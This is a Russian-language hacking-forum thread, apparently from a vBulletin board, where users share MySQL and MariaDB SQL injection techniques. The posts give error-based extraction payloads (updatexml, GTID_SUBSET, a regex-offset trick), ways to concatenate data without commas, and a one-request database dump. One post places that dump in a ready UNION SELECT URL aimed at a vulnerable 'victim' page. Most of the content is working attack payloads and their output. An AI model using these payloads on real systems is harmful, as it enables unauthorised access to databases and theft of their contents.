Старый 21.06.2014, 21:57   #31
l1ght
 
Аватар для l1ght
 
Регистрация: 04.07.2010
Сообщений: 31
Репутация: 32
По умолчанию

пожалуй это самый большой сдвиг в sql inj с момента публикаций qwazar'а
Цитата:
Вы должны добавить отзыв кому-то ещё, прежде чем сможете снова добавить его NameSpace.
дайте ему уже медаль генералиссимуса))
Цитата:
mysql> SELECT host FROM mysql.user ORDER BY 1 LIMIT 0 PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), 1)));
или ещё более коротко procedure analyse (0,updatexml(1,concat(0x3a,version()),1))
mysql >5.1.5
l1ght вне форума   Ответить с цитированием
Старый 01.10.2014, 13:08   #32
BlackFan
 
Аватар для BlackFan
 
Регистрация: 08.07.2010
Сообщений: 354
Репутация: 402
По умолчанию

MySQL >= 5.6.5 Error based
Максимальная длина строки 200 символов

Код:
select GTID_SUBSET(@@version,0);
ERROR 1772 (HY000): Malformed GTID set specification '5.6.20-enterprise-commercial-advanced'.


select GTID_SUBTRACT(@@version,0);
ERROR 1772 (HY000): Malformed GTID set specification '5.6.20-enterprise-commercial-advanced'.
BlackFan вне форума   Ответить с цитированием
Старый 20.05.2015, 16:08   #33
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

находил еще давно, однако максимум до чего дошел - вывод двух полей. вчера случайно обнаружил, что можно намного больше.

аналог concat, в роли separator запятая по дефолту.
Код:
SELECT MAKE_SET(-1,@@version,database(),user(),@@version,user(),database());
5.1.69,u192295142_root,u192295142_root@localhost,5.1.69,u192295142_root@localhost,u192295142_root
faza02 вне форума   Ответить с цитированием
Старый 14.03.2016, 15:35   #34
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Если очень хочется concat, а запятой нет - поможет group_concat:
Код:
mysql> SELECT group_concat(c) FROM (SELECT (1234)c UNION SELECT 5678)t;
+-----------------+
| group_concat(c) |
+-----------------+
| 1234,5678       |
+-----------------+
1 row in set (0.00 sec)
__________________
На правах рекламы.
NameSpace вне форума   Ответить с цитированием
Старый 14.03.2016, 16:48   #35
man474019
 
Регистрация: 18.02.2015
Сообщений: 46
Репутация: 0
По умолчанию

dump Database in one request #SQLi

part 1

Цитата:
(sElect(@x)from(Select(@x:=0x00), (@running_number:=0),
(sElect(0)from(information_schema.columns)where(ta ble_schema!
=0x696e666f726d6174696f6e5f736368656d61)and(0x00)i n(@x:=concat(@x,0x3c62723e,
(@running_number:=@running_number
%2b1),0x2e20,table_schema,0x3a,table_name,0x3a,col umn_name))))x)
part 2

Цитата:
(sElect(@) from (sElect (@:=0x00), (@running_number:=0),(sElect (@) from (table) where (@) in
(@:=concat(@,(@running_number:=@running_number%2b1 ),0x0a,column,0x3a,column))))a)

exploitable example will be like this

Цитата:
victim/sqli.php?id=45 UNION SELECT 1,(sElect(@x)from(Select(@x:=0x00),
(@running_number:=0),(sElect(0)from(information_sc hema.columns)where(table_schema!
=0x696e666f726d6174696f6e5f736368656d61)and(0x00)i n(@x:=concat(@x,0x3c62723e,
(@running_number:=@running_number
%2b1),0x2e20,table_schema,0x3a,table_name,0x3a,col umn_name))))x),3,4,5,6,7,8,9,10,11,12--
http://paste.ee/r/MGd10
@1x0123
man474019 вне форума   Ответить с цитированием
Старый 15.07.2016, 20:21   #36
spari
 
Регистрация: 10.09.2012
Сообщений: 45
Репутация: 23
По умолчанию

MariaDB маленький error-based трюк, с помощью regex.
Код:
SELECT 1 rlike concat(1,0x5b);
Got error 'missing terminating ] for character class at offset 2' from regexp
the [] must be closed, when we remain it open, we get an error of char 2.
we can control the offset using rpad/lpad.
Код:
SELECT 1 rlike rpad(1,123,0x5b);
Got error 'missing terminating ] for character class at offset 123' from regexp

which means, we can extract data using hex(hex()), as it only accept numbers.
limited to 8 chars.
Код:
SELECT 1 rlike rpad(1,substring(hex(hex(version())),1,8),0x5b);
Got error 'missing terminating ] for character class at offset 33313330' from regexp
SELECT 1 rlike rpad(1,substring(hex(hex(version())),8,8),0x5b);
Got error 'missing terminating ] for character class at offset 3245333' from regexp
SELECT 1 rlike rpad(1,substring(hex(hex(version())),16,8),0x5b);
Got error 'missing terminating ] for character class at offset 13245333' from regexp
SELECT 1 rlike rpad(1,substring(hex(hex(version())),24,8),0x5b);
Got error 'missing terminating ] for character class at offset 13335324' from regexp
SELECT 1 rlike rpad(1,substring(hex(hex(version())),32,8),0x5b);
Got error 'missing terminating ] for character class at offset 43444363' from regexp
......
unhex(unhex('3331333032453331324533313335324434443 63137323639363134343432')) = 10.1.15-MariaDB.

Последний раз редактировалось spari; 16.07.2016 в 22:07..
spari вне форума   Ответить с цитированием
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd. Перевод: zCarot